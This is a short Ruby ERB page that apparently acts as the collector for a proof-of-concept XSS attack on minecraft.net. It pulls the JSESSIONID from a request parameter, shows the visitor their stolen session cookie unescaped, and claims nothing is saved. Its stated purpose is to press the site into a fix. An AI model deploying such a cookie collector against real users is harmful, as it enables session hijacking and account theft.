<%m = /JSESSIONID=(?<sess>[^;]+);/.match params[:c]unless m %> <

1. <%
2. m = /JSESSIONID=(?<sess>[^;]+);/.match params[:c]
3.  
4. unless m
5. %>
6. <h1> for this trick to work, you need to be logged into minecraft.net</h1>
7. <%
8. else
9. %>
10. <h1>your minecraft session cookie is <%= m[:sess] %></h1>
11. <p>don't worry, none of your data was saved. this is just a proof of concept attack on an XSS vulnerability in minecraft.net. Pester notch to fix this <i>now</i>, because I just got your cookie and so can any bad guy</p>
12. <p>In layman's terms, <b>I could have just stolen your account, and there's nothing you could have done to stop me</b></p>
13. <%
14. end
15. %>